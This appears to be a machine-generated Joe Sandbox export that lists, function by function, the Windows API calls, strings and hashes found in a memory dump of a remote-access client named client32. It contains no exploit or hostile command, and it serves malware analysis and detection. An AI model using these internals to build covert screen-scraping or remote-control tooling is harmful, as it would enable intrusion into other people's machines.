                                                                                • String ID: %s:%u$Announce Error from %s. Invalid crc - ignoring$Announcement from %s [announcer-apptype: 0x%x] [target-apptype: 0x%x] [flags: 0x%08x]$IsA()$ListenPort$NSMWControl32$NSSWControl32$NSTWControl32$Port$TCPIP$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$port
                                                                                • API String ID: 3701541597-1781216912
                                                                                • Opcode ID: 011a09e4ebf555cb1d293c9696a7e6a42301eb6d37c4b5b12f9704b45b5c4a0d
                                                                                • Instruction ID: 5c383da36f12d4855d2941ef62f3cc5b6d46123aa205a4bcc3d01b822d31dab0
                                                                                • Opcode Fuzzy Hash: 011a09e4ebf555cb1d293c9696a7e6a42301eb6d37c4b5b12f9704b45b5c4a0d
                                                                                • Instruction Fuzzy Hash: 3AD1A278E0461AABDF84DF94DC91FEEF7B5EF85308F044159E816AB245EB30A904CB61
                                                                                Function 11031820 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 245sleepwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,1B702977,00000000,00000000,00000000), ref: 1103185A
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • EnumWindows.USER32(11030850,00000001), ref: 11031932
                                                                                • EnumWindows.USER32(11030850,00000000), ref: 1103198C
                                                                                • Sleep.KERNEL32(00000014,?,?,?,?,?,00000000), ref: 1103199C
                                                                                • Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 110319D3
                                                                                  • Part of subcall function 11028450: _memset.LIBCMT ref: 11028485
                                                                                  • Part of subcall function 11028450: wsprintfA.USER32 ref: 110284BA
                                                                                  • Part of subcall function 11028450: WaitForSingleObject.KERNEL32(?,000000FF), ref: 110284FF
                                                                                  • Part of subcall function 11028450: GetExitCodeProcess.KERNEL32(?,?), ref: 11028513
                                                                                  • Part of subcall function 11028450: CloseHandle.KERNEL32(?,00000000), ref: 11028545
                                                                                  • Part of subcall function 11028450: CloseHandle.KERNEL32(?), ref: 1102854E
                                                                                • Sleep.KERNEL32(0000000A,?,?,?,?,?,00000000), ref: 110319EB
                                                                                • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 11031AA7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
                                                                                • String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
                                                                                • API String ID: 3887438110-1852639040
                                                                                • Opcode ID: 0e329b33fc34c995a825831ad91e2baf469aabc71c50886a28b6731a55182f00
                                                                                • Instruction ID: e4a431c807ee13d88d7f5229128d7dd46b9a7d2a7c1cad66ff6ecfc7424b804f
                                                                                • Opcode Fuzzy Hash: 0e329b33fc34c995a825831ad91e2baf469aabc71c50886a28b6731a55182f00
                                                                                • Instruction Fuzzy Hash: 9D919D75E002299FDB14CF64CC80BEEF7F5AF89309F1441A9D9599B240EB31AE81CB91
                                                                                Function 110CF130 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 239COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                • ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                • GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                • GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 110CF2FC
                                                                                • GetClientRect.USER32(00000000,?), ref: 110CF3C3
                                                                                • CreateWindowExA.USER32(00000000,Static,11195264,5000000E,?,?,00000010,00000010,?,00003A97,00000000,00000000), ref: 110CF400
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Rect$ClientCreateItemLongObjectShowText
                                                                                • String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                • API String ID: 4172769820-2231854162
                                                                                • Opcode ID: c3b9e28978103be5a937d48a63f04c3ffe11da8c089b37b84e1aa512a40c65d6
                                                                                • Instruction ID: 2d84ac58a4c57407e54c3cb5711102d4444eebaf719169cc73b89b5b27c55d8a
                                                                                • Opcode Fuzzy Hash: c3b9e28978103be5a937d48a63f04c3ffe11da8c089b37b84e1aa512a40c65d6
                                                                                • Instruction Fuzzy Hash: 8F81C375E00716ABD721CF64CC85F9EB3F4BB88B08F0045ADE5569B680EB74A940CF92
                                                                                Function 110B39F0 Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 228COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • EnterCriticalSection.KERNEL32(?,View,limitcolorbits,00000000,00000000,1B702977,111F10F8,111E6C98,?), ref: 110B3A64
                                                                                • UnionRect.USER32(?,?,?), ref: 110B3B12
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 110B3CAD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeaveRectUnion__wcstoi64
                                                                                • String ID: 8$Client$ScrapeBandwidth$ScrapeBandwidthPeriod$ScrapeBusyDelay$ScrapeNotBusyDelay$ScrapeSkipDelay$View$d$limitcolorbits
                                                                                • API String ID: 3518726166-774679399
                                                                                • Opcode ID: 9ed2b62170dfdd6d390585d58a5c009429d8adca9bb6f56d08ac168bf57d857b
                                                                                • Instruction ID: aebd380d628d0b1599e2b276af2785b4fa2c3b861337a9a0e451ff4e8484ea1a
                                                                                • Opcode Fuzzy Hash: 9ed2b62170dfdd6d390585d58a5c009429d8adca9bb6f56d08ac168bf57d857b
                                                                                • Instruction Fuzzy Hash: AE915A78E04259AFDB44CFA5D980BEDFBF1FB48304F20815AE909AB344D731A841CB98
                                                                                Function 1110F3F0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 218fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0000017D,1B702977,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
                                                                                • _memset.LIBCMT ref: 1110F4C2
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
                                                                                • WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE
                                                                                  • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1118B168,000000FF), ref: 1110F5F5
                                                                                • _free.LIBCMT ref: 1110F628
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F665
                                                                                • timeEndPeriod.WINMM(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F677
                                                                                • LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,1B702977,0000017D,00000001), ref: 1110F681
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
                                                                                • String ID: End Record %s$PCIR
                                                                                • API String ID: 4278564793-2672865668
                                                                                • Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                • Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
                                                                                • Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                • Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91
                                                                                Function 110F70E0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 176libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll,1B702977,1102E747,?,00000000), ref: 110F711B
                                                                                • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
                                                                                • wsprintfA.USER32 ref: 110F7235
                                                                                • SetLastError.KERNEL32(00000078), ref: 110F7242
                                                                                • wsprintfA.USER32 ref: 110F7267
                                                                                • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
                                                                                • SetLastError.KERNEL32(00000078), ref: 110F72BC
                                                                                • FreeLibrary.KERNEL32(?), ref: 110F72D0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
                                                                                • String ID: %u.%u.%u.%u$%x:%x:%x:%x:%x:%x:%x:%x$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                • API String ID: 856016564-3838485836
                                                                                • Opcode ID: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                                • Instruction ID: 25a542e7ca9f20ccb9d734b321771151ba7e8120a74b68384c663ef2db5eebf1
                                                                                • Opcode Fuzzy Hash: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                                • Instruction Fuzzy Hash: 2161B771D042689FDB18CFA98C98AADFFF5BF49301F0581AEF16A97251D6345904CF20
                                                                                Function 11025000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                • SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                • SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                • SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                • SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                • GetDC.USER32(?), ref: 11025085
                                                                                • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                • SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                • GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                • SelectObject.GDI32(?,?), ref: 110250C7
                                                                                • ReleaseDC.USER32(?,?), ref: 110250CF
                                                                                • SetCaretPos.USER32(?,?), ref: 11025111
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
                                                                                • String ID:
                                                                                • API String ID: 4100900918-3916222277
                                                                                • Opcode ID: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                                • Instruction ID: b0707e50622e5a2dee3f64ca7938c426cfa52823b6f102614556d1b444951bd6
                                                                                • Opcode Fuzzy Hash: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                                • Instruction Fuzzy Hash: 84414C71A41318AFEB10DFA4CD84FAEBBF8EF89700F118169F915AB244DB749900CB60
                                                                                Function 1101F0D0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 116windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 1101F0FE
                                                                                • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D
                                                                                  • Part of subcall function 110CCE60: GetWindowRect.USER32(110CEFF5,?), ref: 110CCE7C
                                                                                  • Part of subcall function 110CCE60: SetRectEmpty.USER32(?), ref: 110CCE88
                                                                                • DeleteObject.GDI32(00000000), ref: 1101F16C
                                                                                • DeleteObject.GDI32(00000000), ref: 1101F178
                                                                                • CreateFontIndirectA.GDI32(?), ref: 1101F187
                                                                                • CreateFontIndirectA.GDI32(?), ref: 1101F19F
                                                                                • GetMenuItemCount.USER32 ref: 1101F1A7
                                                                                • _memset.LIBCMT ref: 1101F1CF
                                                                                • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F20C
                                                                                • __strdup.LIBCMT ref: 1101F221
                                                                                • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1101F279
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect_memset$CountEmptyParametersSystemWindow__strdup
                                                                                • String ID: 0$MakeOwnerDraw
                                                                                • API String ID: 1249465458-1190305232
                                                                                • Opcode ID: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
                                                                                • Instruction ID: cad075490b8b101532292c9a84c7126ab9bfd0db94d612dc2b0baac2de7b47d0
                                                                                • Opcode Fuzzy Hash: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
                                                                                • Instruction Fuzzy Hash: 19417E71D012399BDB64DFA4CC89BD9FBB8BB09708F0001D9E508A7284DBB46A84CF94
                                                                                Function 1112B9B0 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 100libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112B9E6
                                                                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112BA03
                                                                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112BA0D
                                                                                • GetProcAddress.KERNEL32(00000000,socket), ref: 1112BA1B
                                                                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112BA29
                                                                                • GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112BA37
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 1112BAAC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                • String ID: WSACleanup$WSAIoctl$WSAStartup$closesocket$socket$ws2_32.dll
                                                                                • API String ID: 2449869053-2279908372
                                                                                • Opcode ID: cea9448887420246af282f77f4e5a4ecce69bf7a034b252f213f846cda0e5cbe
                                                                                • Instruction ID: 1bba0573f20789ca060975004b1edadb32616992e73bf794dbb13e42fcf3a639
                                                                                • Opcode Fuzzy Hash: cea9448887420246af282f77f4e5a4ecce69bf7a034b252f213f846cda0e5cbe
                                                                                • Instruction Fuzzy Hash: 5231B371B11228ABEB249F758C55FEEF7B8EF8A315F104199FA09A7280DA705D408F94
                                                                                Function 1102370A Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 363windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1115BAE0: IsIconic.USER32(?), ref: 1115BB87
                                                                                  • Part of subcall function 1115BAE0: ShowWindow.USER32(?,00000009), ref: 1115BB97
                                                                                  • Part of subcall function 1115BAE0: BringWindowToTop.USER32(?), ref: 1115BBA1
                                                                                • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102384D
                                                                                • ShowWindow.USER32(?,00000003), ref: 110238D1
                                                                                • LoadMenuA.USER32(00000000,000013A3), ref: 110239FB
